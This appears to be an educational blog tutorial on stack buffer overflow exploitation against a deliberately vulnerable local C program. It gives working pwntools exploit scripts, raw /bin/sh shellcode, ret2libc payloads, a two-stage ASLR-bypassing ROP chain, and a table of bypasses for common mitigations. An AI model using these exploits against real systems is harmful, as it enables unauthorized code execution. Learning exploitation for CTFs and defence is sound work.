# Stack Buffer Overflows: From Crash to Shell
Buffer overflows are the grandfather of memory corruption vulnerabilities. Decades old, largely mitigated in modern software — but understanding them is foundational. They appear in CTFs constantly, they still exist in embedded firmware and legacy systems, and every other exploitation technique builds on the concepts here.
This post assumes basic C knowledge and Linux familiarity. We'll go from a vulnerable program to an interactive shell (a root shell only if the target runs with root privileges).
## The stack, briefly
The call stack is a region of memory used to manage function calls. When you call a function, the call instruction pushes the return address and the function's prologue sets up the rest of the stack frame, which contains:
High addresses
┌──────────────────────┐
│ caller's data │
├──────────────────────┤
│ return address │ ← where execution returns after the function
├──────────────────────┤
│ saved EBP/RBP │ ← caller's base pointer
├──────────────────────┤
│ local variables │ ← including buffers
│ ... │
└──────────────────────┘
Low addresses (stack grows down)
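When gets() or strcpy() writes more data than a buffer can hold, the extra bytes run past the end of the buffer toward higher addresses, overwriting the saved base pointer and then the saved return address. When the function returns, the CPU jumps to the address you supplied instead of back to the original caller.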
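As a rough illustration of that overwrite, the sketch below models a 32-bit frame as a flat byte array and copies into it without a bounds check. The saved EBP and return address values are placeholders chosen for the example, and the model ignores any padding a real compiler inserts between the buffer and the saved registers.

```python
import struct

BUF_SIZE = 64            # matches char buf[64]
SAVED_EBP = 0xffffd508   # placeholder value, for illustration only
RET_ADDR = 0x080491e2    # placeholder value, for illustration only

def make_frame():
    """Model a frame from low to high addresses: buf, saved EBP, return address."""
    return bytearray(BUF_SIZE) + struct.pack("<II", SAVED_EBP, RET_ADDR)

def unchecked_copy(frame, data):
    """Copy like gets(): start at buf[0] and keep writing, ignoring BUF_SIZE."""
    frame[0:len(data)] = data
    return frame

def read_frame(frame):
    """Return (saved EBP, return address) as the function epilogue would see them."""
    return struct.unpack_from("<II", frame, BUF_SIZE)

safe = unchecked_copy(make_frame(), b"A" * 16)
smashed = unchecked_copy(make_frame(), b"A" * BUF_SIZE + b"BBBB" + b"CCCC")

print([hex(v) for v in read_frame(safe)])     # ['0xffffd508', '0x80491e2']
print([hex(v) for v in read_frame(smashed)])  # ['0x42424242', '0x43434343']
```

The short input leaves the saved values alone; the long one replaces the return address with bytes taken straight from the input.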
## Vulnerable program
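// vuln.c
#include <stdio.h>
#include <string.h>

// gets() was removed in C11, so recent glibc headers may not declare it;
// declare it explicitly so the demo still compiles with a modern GCC.
char *gets(char *s);

void vuln(void) {
    char buf[64];
    gets(buf); // never use gets(): it does no bounds checking
    printf("You said: %s\n", buf);
}

int main(void) {
    vuln();
    return 0;
}

Compile with mitigations disabled (for learning):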
gcc -m32 -fno-stack-protector -z execstack -no-pie -o vuln vuln.c
# -m32: 32-bit for simpler addresses
# -fno-stack-protector: no canary
# -z execstack: stack is executable
# -no-pie: fixed addresses (no ASLR at binary level)

## Step 1: Find the crash
python3 -c "print('A' * 100)" | ./vuln
# Segmentation fault

Now use a cyclic pattern to find exactly which offset overwrites EIP:
# Using pwntools
python3 -c "from pwn import *; print(cyclic(200).decode())" | ./vuln
# Segfault
# Find the offset from the crash address
dmesg | tail -1 # shows the faulting address, e.g., 0x61616174
python3 -c "from pwn import *; print(cyclic_find(0x61616174))"
# Output: 76, so EIP is overwritten at offset 76

Manually with GDB:
gdb ./vuln
(gdb) run < <(python3 -c "print('A'*100)")
(gdb) info registers eip
# eip = 0x41414141 (four A's, confirming control of EIP)

## Step 2: Control EIP
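The offset of 76 used in this step comes from the cyclic-pattern lookup in Step 1. For readers who want to see how that lookup works without pwntools, here is a minimal standard-library sketch. It generates a de Bruijn sequence over lowercase letters with 4-byte windows, which is intended to mirror pwntools' default pattern; make_pattern and find_offset are names made up for this example.

```python
import struct
from itertools import islice

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"

def de_bruijn(alphabet, n):
    """Yield a de Bruijn sequence: each length-n window appears once per cycle."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                yield from (alphabet[i] for i in a[1:p + 1])
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

def make_pattern(length, n=4):
    """Return the first `length` bytes of the pattern."""
    return bytes(islice(de_bruijn(ALPHABET, n), length))

def find_offset(value, length=200):
    """Locate a little-endian 32-bit register value inside the pattern (-1 if absent)."""
    return make_pattern(length).find(struct.pack("<I", value))

print(make_pattern(20))         # b'aaaabaaacaaadaaaeaaa'
print(find_offset(0x61616174))  # 76
```

Because every 4-byte window is unique, whatever value lands in EIP identifies exactly one position in the input.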
# exploit.py
from pwn import *
offset = 76
payload = b"A" * offset + b"B" * 4 # B's will overwrite EIP
p = process("./vuln")
p.sendline(payload)
p.interactive()

python3 exploit.py
# EIP should be 0x42424242 (four B's)

## Step 3: ret2shellcode (NX disabled)
When the stack is executable (-z execstack), we can place shellcode in the buffer and jump to it.
Shellcode for a /bin/sh shell (32-bit Linux):
from pwn import *
context.arch = 'i386'
context.os = 'linux'
shellcode = asm(shellcraft.sh())
# Or use pre-written shellcode:
# shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
offset = 76
# Find the buffer address in GDB:
# (gdb) break vuln
# (gdb) run
# (gdb) x/32wx $esp — look for where your input lands
# (gdb) p &buf — or directly get the local var address
buf_addr = 0xffffd4a0 # address of buf[] seen in GDB; assumes ASLR is disabled, and can shift outside GDB because the environment differs
payload = shellcode
payload += b"A" * (offset - len(shellcode)) # padding
payload += p32(buf_addr) # overwrite EIP with start of our shellcode
p = process("./vuln")
p.sendline(payload)
p.interactive()

This technique is blocked by NX (non-executable stack). Most modern systems have NX enabled.
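Two practical details of the payload in this step are easy to miss: gets() stops reading at a newline, so the payload must not contain byte 0x0a, and the buffer address is rarely exact, so a short NOP sled gives some slack. The sketch below shows one way to handle both with only the standard library. build_ret2shellcode and the sled length are assumptions for illustration, and the shellcode is the pre-written 23-byte sequence quoted above.

```python
import struct

BAD_BYTES = b"\n"  # gets() stops reading at a newline

def build_ret2shellcode(shellcode, offset, buf_addr, sled_len=16):
    """Lay out [NOP sled][shellcode][padding][return address into the sled]."""
    body = b"\x90" * sled_len + shellcode
    if len(body) > offset:
        raise ValueError("sled + shellcode do not fit before the return address")
    target = buf_addr + sled_len // 2  # aim at the middle of the sled
    payload = body.ljust(offset, b"A") + struct.pack("<I", target)
    bad = sorted(hex(b) for b in set(payload) if b in BAD_BYTES)
    if bad:
        raise ValueError(f"payload contains bytes gets() would stop at: {bad}")
    return payload

SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")

payload = build_ret2shellcode(SHELLCODE, offset=76, buf_addr=0xffffd4a0)
print(len(payload), payload[-4:].hex())  # 80 a8d4ffff
```

If the computed return address happens to contain 0x0a, the helper raises instead of silently producing a payload that gets() would truncate; changing the sled length moves the target address.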
## Step 4: ret2libc (NX enabled)
When the stack isn't executable, we can't run shellcode there, but we can still return into code that is already mapped as executable. libc contains both system() and the string "/bin/sh", so all we need are those two addresses.
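To see why those two addresses (plus a dummy return address) are enough, it helps to model what system() finds on the stack when vuln() returns into it. On 32-bit x86 with the cdecl convention, a function expects its return address at [esp] and its first argument at [esp+4]. The sketch below is a simplified model using the example addresses from this post as placeholders; simulate_ret_into is a made-up helper, not a pwntools function.

```python
import struct

OFFSET = 76
# Placeholder addresses; real values depend on the libc that is loaded
SYSTEM, EXIT, BINSH = 0xf7e3d200, 0xf7e2e1d0, 0xf7f569e8

payload = b"A" * OFFSET + struct.pack("<III", SYSTEM, EXIT, BINSH)

def simulate_ret_into(payload, offset):
    """Model the state right after vuln()'s ret pops the overwritten return address."""
    eip, at_esp, at_esp_plus_4 = struct.unpack_from("<III", payload, offset)
    # ret loads the first word into EIP; ESP then points at the second word.
    # The callee treats [esp] as its return address and [esp+4] as its first argument.
    return {"eip": eip, "return_address": at_esp, "arg0": at_esp_plus_4}

state = simulate_ret_into(payload, OFFSET)
print({k: hex(v) for k, v in state.items()})
# {'eip': '0xf7e3d200', 'return_address': '0xf7e2e1d0', 'arg0': '0xf7f569e8'}
```

The word after the system() address is easy to forget: it is where system() returns when the shell exits, which is why exit() is a tidy choice.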
# Find system() address
gdb ./vuln
(gdb) p system
# $1 = {<text variable, no debug info>} 0xf7e3d200 <system>
# Find "/bin/sh" in libc
(gdb) find &system, +999999, "/bin/sh"
# 0xf7f569e8 <-- address of "/bin/sh" string in libc

Or from the shell:
ldd ./vuln | grep libc
# libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7c00000)
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " system@@"
# Returns offset of system() from libc base
strings -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
# Returns offset of /bin/sh string

Build the payload:
from pwn import *
offset = 76
# Hardcoded addresses (ASLR disabled: echo 0 > /proc/sys/kernel/randomize_va_space)
system_addr = 0xf7e3d200
exit_addr = 0xf7e2e1d0 # return addr after system() — use exit() to clean up
binsh_addr = 0xf7f569e8
# Stack layout after overflow:
# [padding][EIP=system][return_after_system=exit][arg_to_system=/bin/sh]
payload = b"A" * offset
payload += p32(system_addr)
payload += p32(exit_addr)
payload += p32(binsh_addr)
p = process("./vuln")
p.sendline(payload)
p.interactive()

## Step 5: ROP chains (ASLR + NX)
When ASLR randomises libc's base address, we can't hardcode system(). We need to:
- Leak a libc address at runtime (to find the real base)
- Calculate the addresses of system() and /bin/sh from that base
- Build a ROP chain that calls system("/bin/sh")
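The leak-and-calculate steps above come down to simple arithmetic, sketched here with the standard library only. The three offsets are hypothetical placeholders; real values come from the exact libc build on the target (for example via readelf and strings, as in Step 4). The leak is simulated rather than read from a process.

```python
import struct

# Hypothetical offsets from the libc base; they differ for every libc build
PUTS_OFFSET = 0x80e50
SYSTEM_OFFSET = 0x50d70
BINSH_OFFSET = 0x1d8678

def parse_leak(raw_line):
    """puts() stops at the first NUL, so a 64-bit pointer usually arrives as 6 bytes."""
    return struct.unpack("<Q", raw_line[:6].ljust(8, b"\x00"))[0]

def resolve(leaked_puts):
    """Turn one leaked address into the addresses the final chain needs."""
    base = leaked_puts - PUTS_OFFSET
    if base & 0xfff:
        raise ValueError("base is not page-aligned: wrong libc or bad leak")
    return {"base": base,
            "system": base + SYSTEM_OFFSET,
            "binsh": base + BINSH_OFFSET}

# Simulated leak: what puts(puts@got) would print for a made-up base address
fake_base = 0x7f3a1c200000
raw = struct.pack("<Q", fake_base + PUTS_OFFSET)[:6] + b"\n"

addrs = resolve(parse_leak(raw))
print({k: hex(v) for k, v in addrs.items()})
```

The page-alignment check is a cheap sanity test: library bases are page-aligned, so a base with non-zero low 12 bits usually means the offsets belong to a different libc.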
ROP (Return-Oriented Programming) chains together small code sequences ending in ret ("gadgets") to build arbitrary computation from existing executable code.
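To make the mechanism concrete, here is a toy interpreter that walks a chain the way the CPU would: each ret pops the next address off the stack and "executes" whatever gadget lives there. It is a deliberately simplified model, not an emulator, and every address in it is hypothetical.

```python
# Hypothetical addresses, for illustration only
POP_RDI, RET = 0x401203, 0x40101a
SYSTEM, BINSH = 0x7f3a1c250d70, 0x7f3a1c3d8678

# What lives at each address in this toy model
GADGETS = {POP_RDI: "pop rdi; ret", RET: "ret", SYSTEM: "call system"}

def run_chain(chain):
    """Walk the chain; index 0 is the word that overwrote the return address."""
    stack = list(chain)
    regs = {"rdi": 0}
    calls = []
    while stack:
        rip = stack.pop(0)              # ret: pop the next address into RIP
        op = GADGETS.get(rip)
        if op == "pop rdi; ret":
            regs["rdi"] = stack.pop(0)  # the gadget consumes one more stack word
        elif op == "call system":
            calls.append(("system", regs["rdi"]))
        elif op != "ret":
            break                       # unknown address: a real process would crash
    return calls, regs

calls, regs = run_chain([RET, POP_RDI, BINSH, SYSTEM])
print(calls == [("system", BINSH)])  # True
```

The chain itself is only data on the stack; the behaviour comes entirely from code that already exists in the binary and libc, which is why NX does not stop it.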
# Find gadgets with ROPgadget
ROPgadget --binary ./vuln --rop
# Or with ropper
ropper -f ./vuln --search "pop eax; ret"

A full ROP chain for 64-bit with ASLR is more involved: it uses puts() to leak a libc address, calculates the libc base, then calls system("/bin/sh").
from pwn import *
elf = ELF("./vuln64")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
rop = ROP(elf)
offset = 72 # assumption: 64-byte buf + 8-byte saved RBP; confirm with cyclic() on your own build
# Stage 1: leak puts@got to find libc base
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
stage1 = b"A" * offset
stage1 += p64(pop_rdi)
stage1 += p64(elf.got['puts']) # arg: address of puts in GOT
stage1 += p64(elf.plt['puts']) # call puts(puts_got) — leaks libc addr
stage1 += p64(elf.sym['main']) # return to main for stage 2
p = process("./vuln64")
p.sendline(stage1)
# Parse the leaked address
p.recvuntil(b"You said: ")
p.recvline() # skip the rest of the echoed input line
leak = u64(p.recvline()[:6].ljust(8, b'\x00')) # next line is the output of puts(puts@got)
libc.address = leak - libc.sym['puts']
log.info(f"libc base: {libc.address:#x}")
# Stage 2: now call system("/bin/sh")
# (ret gadget for stack alignment on 64-bit)
ret = rop.find_gadget(['ret'])[0]
stage2 = b"A" * offset
stage2 += p64(ret) # align stack (required on 64-bit)
stage2 += p64(pop_rdi)
stage2 += p64(next(libc.search(b'/bin/sh\x00')))
stage2 += p64(libc.sym['system'])
p.sendline(stage2)
p.interactive()

## Modern mitigations and what breaks them
| Mitigation | What it does | How to bypass |
|---|---|---|
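| Stack canary | Random value placed between local variables and the saved return address; checked before the function returns | Leak the canary (e.g. via a format string bug), brute-force it byte by byte (forking servers), or use a write that reaches the return address without crossing the canary |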
| NX / DEP | Stack/heap not executable | ret2libc, ROP chains |
| ASLR | Randomises load addresses | Leak addresses at runtime, brute force (32-bit has limited entropy), heap spraying |
| PIE | Binary itself is ASLR'd | Leak binary address, then compute all offsets |
| RELRO (Full) | GOT is read-only | GOT overwrites no longer work; aim the write-what-where at other writable code pointers (e.g. saved return addresses) |
| SafeStack | Keeps return addresses in a separate protected stack | Rarely deployed, requires compiler support |
Bypassing all of these simultaneously (Full RELRO + Canary + NX + ASLR + PIE) requires multiple vulnerabilities chained together — the typical path is: leak via format string → leak binary/libc base → ROP to one_gadget (a single libc gadget that spawns a shell when constraints are met).
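The "brute force (fork servers)" entry in the table is worth a closer look, since it is why forking servers weaken canaries: every child inherits the parent's canary, so it can be guessed one byte at a time with a crash as the signal. The sketch below simulates that with an in-process oracle instead of a real server. The oracle and function names are invented for this example, and it assumes a 4-byte canary whose first byte is 0x00, as glibc's are.

```python
import os

def make_oracle(canary):
    """Simulate a forking server: every child shares the canary and survives
    only if the bytes written over the canary so far match it."""
    def survives(overflow):
        return canary.startswith(overflow)
    return survives

def brute_force_canary(survives, size=4):
    """Recover the canary byte by byte: at most 256 guesses per byte."""
    known = b""
    attempts = 0
    for _ in range(size):
        for guess in range(256):
            attempts += 1
            if survives(known + bytes([guess])):
                known += bytes([guess])
                break
        else:
            raise RuntimeError("no guess survived; the canary may change per connection")
    return known, attempts

secret = b"\x00" + os.urandom(3)  # simulated canary, first byte is NUL
recovered, attempts = brute_force_canary(make_oracle(secret))
print(recovered == secret, attempts <= 4 * 256)  # True True
```

Guessing all four bytes at once would take up to 2^32 tries; guessing them one at a time takes at most 1024, which is the whole point of the technique.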
## Essential tools
| Tool | Use |
|---|---|
| pwntools | Python library for exploit development |
| GDB + pwndbg | Dynamic analysis with memory inspection |
| ROPgadget / ropper | Find ROP gadgets |
| checksec | Check binary protections |
| one_gadget | Find magic gadgets in libc that exec a shell |
| patchelf | Change a binary's linked libc for local testing |
checksec --file=./vuln
# Output shows: Canary, NX, PIE, RELRO status

Buffer overflows in 2025 are largely a solved problem in new software, but the exploitation techniques they teach are the foundation of every heap exploit, kernel pwn, and browser bug that still exists. If you're on the CTF track, start here.